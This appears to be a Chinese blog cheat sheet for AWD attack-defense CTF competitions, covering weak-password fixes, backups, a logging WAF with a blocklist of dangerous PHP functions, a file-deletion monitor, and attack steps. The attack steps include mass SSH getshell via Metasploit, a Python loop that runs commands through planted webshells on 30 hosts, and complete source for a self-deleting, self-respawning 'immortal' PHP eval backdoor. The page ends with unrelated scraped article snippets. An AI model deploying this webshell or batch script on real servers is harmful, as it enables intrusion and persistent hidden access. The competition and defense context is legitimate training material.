round1 弱口令

cat /etc/passwd  查看用户信息

修改用户密码(passwd  username)

通过ssh弱口令批量getshell  (通过msf的auxiliary/scanner/ssh/ssh_login模块)

还要修改web服务的后台管理密码

round2 备份&找后门

端口开放情况(linux: netstat -utnlp     windows: netstat -an)

ls -a 查看隐藏文件

WEB服务

备份并下载源码:

tar -zcvg /tmp/bakweb.tar.gz /var/www/html    打包备份
scp -r www-data@43.224.34.73:/var/www/html  /root/myHacking/web  将远程43.224.34.73/var/www/html目录下所有的文件传输到本地/root/myHacking/web目录下,-r递归

用D盾查杀

一句话后门批量攻击脚本

import requests

for i in range(101,131):

    url="http://172.20."+str(i)+".101/shell.php?shell=system('cat /flag* ');"

    try:

        req=requests.get(url)

        print "172.20."+str(i)+".101",req.text

    except:

        pass

round3 部署流量监控、WAF

(1)waf.php 记录别人对你的所有敏感请求,  将其部署到配置文件,或者你想要监控的文件下   (require_once 'waf.php'),会生成log.txt文件,查看请求日志

<?php

error_reporting(0);

define('LOG_FILENAME', 'log.txt');

function waf() {

    if (!function_exists('getallheaders')) {

        function getallheaders() {

            foreach ($_SERVER as $name => $value) {

                if (substr($name, 0, 5) == 'HTTP_') $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5))))) ] = $value;

            }

            return $headers;

        }

    }

    $get = $_GET;

    $post = $_POST;

    $cookie = $_COOKIE;

    $header = getallheaders();

    $files = $_FILES;

    $ip = $_SERVER["REMOTE_ADDR"];

    $method = $_SERVER['REQUEST_METHOD'];

    $filepath = $_SERVER["SCRIPT_NAME"];

    //rewirte shell which uploaded by others, you can do more

    foreach ($_FILES as $key => $value) {

        $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']);

        file_put_contents($_FILES[$key]['tmp_name'], "virink");

    }

    unset($header['Accept']); //fix a bug

    $input = array(

        "Get" => $get,

        "Post" => $post,

        "Cookie" => $cookie,

        "File" => $files,

        "Header" => $header

    );

    //deal with

    $pattern = "select|insert|update|delete|and|or|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex";

    $pattern.= "|file_put_contents|fwrite|curl|system|eval|assert";

    $pattern.= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";

    $pattern.= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec";

    $vpattern = explode("|", $pattern);

    $bool = false;

    foreach ($input as $k => $v) {

        foreach ($vpattern as $value) {

            foreach ($v as $kk => $vv) {

                if (preg_match("/$value/i", $vv)) {

                    $bool = true;

                    logging($input);

                    break;

                }

            }

            if ($bool) break;

        }

        if ($bool) break;

    }

}

function logging($var) {

    date_default_timezone_set("Asia/Shanghai");//修正时间为中国准确时间

    $time=date("Y-m-d H:i:s");//将时间赋值给变量$time

    file_put_contents(LOG_FILENAME, "\r\n\r\n\r\n" . $time . "\r\n" . print_r($var, true) , FILE_APPEND);

    // die() or unset($_GET) or unset($_POST) or unset($_COOKIE);

}

waf();

?>

(2)监控最近10分钟被修改的PHP文件并删除

import sys,subprocess,os

#查找最近10分钟被修改的文件

def scanfile():

	#command: find -name '*.php' -mmin -10

	command = "find -name \'*.php\' -mmin -10"

	su = subprocess.Popen(command,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)

	STDOUT,STDERR = su.communicate()

	list = STDOUT.split("\n")

	#print str(list)

	#将文件处理成list类型然后返回。

	return list

#读取文件:

def loadfile(addr):

	data = ""

	#如果文件不存在就跳出函数

	try :

		file = open(addr,'r')

		data = file.read()

	except :

		return 0

	all_data = addr+"\n"+data+"\n\n"

	file1 = open("shell.txt",'a+')

	#避免重复写入

	try:

		shell_content = file1.read()

	except:

		shell_content = "null"

	#如果文件内容不为空再写入,避免写入空的。

	#print shell_content

	if data :

		if all_data not in shell_content:

			file1.write(all_data)

	file.close()

	file1.close()

	rm_cmd = "rm -rf "+addr

	su = subprocess.Popen(rm_cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)

	su.communicate()

	print "loadfile over : "+addr

if __name__ == '__main__':

	while True:

		list = scanfile()

		if list :

			for i in range(len(list)):

				#如果list[i]为空就不读取了

				if list[i]:

					loadfile(str(list[i]))

		else : pass

(3)一个简单的文件监控示例脚本,可以监控创建、删除、移动、属性修改操作,自动删除新增文件或目录。已使用pyinstaller打包成了linux可执行程序

https://github.com/PlutoaCharon/AWD-Attack-Defense/tree/master/CTFDefense-CTFDefense/Monitor

round4 渗透测试与代码审计

这个就看个人能力了,没什么好说的。

找到漏洞别忘了修补自己的:

AWD攻防赛之各类漏洞FIX方案

round5 拿到shell之后上传不死马

很多时候,找到一个漏洞,然后注入不死马,就高枕无忧了

不死马编写与防御参考:

https://www.cnblogs.com/unixcs/p/11301377.html

https://www.cnblogs.com/gaonuoqi/p/12057662.html

不死马:

<?php

ignore_user_abort(true);

set_time_limit(0);

unlink(__FILE__);

$file = '.config.php';

$code = '<?php if(md5($_GET["passwd"])=="76a2173be6393254e72ffa4d6df1030a"){@eval($_REQUEST[cmd]);} ?>';

while (1){

    file_put_contents($file,$code);

    usleep(5000);

}

?>

.shell.php?passwd=passwd&cmd=你要执行的命令;

防御:

写入速度要大于不死马的生成速度

<?php

set_time_limit(0);

ignore_user_abort(true);

unlink(__FILE__);

while(1)

{

        file_put_contents('./config.php','11111');

        usleep(0);

}

?>

用bash不断的删除文件

#!/bin/bash

while : ;do rm -rf .shell.php; done;

round6 tips:优质脚本合集

AWD攻防技战法的更多相关文章

  1. Ubunut18 安装docker环境&&AWD攻防平台部署

    docker:有两个版本:docker-ce(社区版)和docker-ee(企业版). 参考官网地址:https://docs.docker.com/engine/installation/linux ...

  2. CTF线下awd攻防文件监控脚本

    CTF线下awd攻防赛中常用一个文件监控脚本来保护文件,但是就博主对于该脚本的审计分析 发现如下的问题: 1.记录文件的路径未修改导致log暴露原文件备份文件夹:drops_JWI96TY7ZKNMQ ...

  3. 关于参加AWD攻防比赛心得体会

    今天只是简单写下心得和体会 平时工作很忙 留给学习的时间更加珍少宝贵. 重点说下第二天的攻防比赛吧  . 三波web题 .涉及jsp,php,py. 前期我们打的很猛.第一波jsp的题看到有首页预留后 ...

  4. AWD攻防工具脚本汇总(一)

    最近工作很忙 今天抽空准备下AWD比赛得攻防工具和脚本 以下只是常用 希望下周不被吊锤~~ 后续整理后想抽空写成一个攻击框架汇总放github~~ 这里从各种情景和需求中去总结工具和脚本的使用   情 ...

  5. AWD攻防工具脚本汇总(二)

    情景五:批量修改ssh密码 拿到官方靶机第一件事改自己机器的ssh密码,当然也可以改别人的密码~ import paramiko import sys ssh_clients = [] timeout ...

  6. AWD攻防赛之各类漏洞FIX方案

    笔者<Qftm>原文发布<FreeBuf>:https://www.freebuf.com/articles/web/208778.html

  7. 线下AWD平台搭建以及一些相关问题解决

    线下AWD平台搭建以及一些相关问题解决 一.前言 文章首发于tools,因为发现了一些新问题但是没法改,所以在博客进行补充. 因为很多人可能没有机会参加线下的AWD比赛,导致缺乏这方面经验,比如我参加 ...

  8. Linux使用inode(i节点号)删除文件

    今天学习Linux的时候遇到的知识点,想起了以前一次线下AWD攻防赛的时候的不死马,记录一下 在Linux里面,有的时候我们会遇到奇奇怪怪的文件名,以至于我们删除不了,比如说我们创建了一个叫做&quo ...

  9. 小迪安全 Web安全 基础入门 - 第九天 信息打点 - CDN绕过篇&漏洞回链&接口探针&全网扫描&反向邮件

    一. CDN知识-工作原理及阻碍 (一)工作原理 1.概述:CDN的全称是Content Delivery Network,即内容分发网络.CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地 ...

随机推荐

  1. java_内部类、匿名内部类的使用

    内部类 将一个类A定义在另一个类B里面,里面的那个类A就称为内部类,B则称为外部类. 内部类的分类 成员内部类,类定义在了成员位置 (类中方法外称为成员位置) 局部内部类,类定义在方法内 成员内部类 ...

  2. 云原生数据库mysql对共享存储分布式文件系统的接口需求分析

    1. 引言 云原生数据库跟分布式mpp数据库是有差异的,虽然两者都是计算与存储分离,但是在资源的占用上有所不同.云原生数据库是shard everything架构,其依赖的存储资源.内存资源.事务资源 ...

  3. 解决CocoaPods could not find compatible versions for pod "React/Core"

    react-native框架中,在ios文件夹下执行pod install命令时出现的问题. 下面时完整的异常信息: [!] CocoaPods could not find compatible v ...

  4. LeetCode343 整数拆分详解

    题目详情 给定一个正整数 n,将其拆分为至少两个正整数的和,并使这些整数的乘积最大化. 返回你可以获得的最大乘积. 示例 1: 输入: 2 输出: 1 解释: 2 = 1 + 1, 1 × 1 = 1 ...

  5. zabbix-4.4.4安装教程(亲测可用)

    1.首先添加yum源zabbix.repo [zabbix]name=zabbixbaseurl=https://mirrors.tuna.tsinghua.edu.cn/zabbix/zabbix/ ...

  6. G4560 HD610安装黑苹果Hakintosh

    这一篇主要是写给使用G4560笔记本折腾黑苹果的朋友. 我折腾了几天黑苹果,发现怎么也无法成功,最后我才知道HD610现在还不支持黑苹果. 由于大多数笔记本不支持屏蔽核显,这意味着要想使用黑苹果必须要 ...

  7. 轻轻松松学CSS:position

    position属性表示元素的定位类型,在CSS布局中,position发挥着非常重要的作用,一些元素的布局就是用position完成的,鉴于此,本文结合一些小实例详细讲解一下. position属性 ...

  8. Maven工程 install和run包配置

    1.New一个Environment变量: Name:global.config.path Value:D:\490993\config;

  9. 设计模式:装饰者模式介绍及代码示例 && JDK里关于装饰者模式的应用

    0.背景 来看一个项目需求:咖啡订购项目. 咖啡种类有很多:美式.摩卡.意大利浓咖啡: 咖啡加料:牛奶.豆浆.可可. 要求是,扩展新的咖啡种类的时候,能够方便维护,不同种类的咖啡需要快速计算多少钱,客 ...

  10. windows服务器下,mysql运行一段时间之后忽然无法连接,但是mysql服务启动正常

    出现这种情况以前都是重启服务器可以解决,但是治标不治本,一段时间之后仍然会出现此问题. 此问题不是mysql应用程序的问题而是windows server system 的配置问题.因此需要修改win ...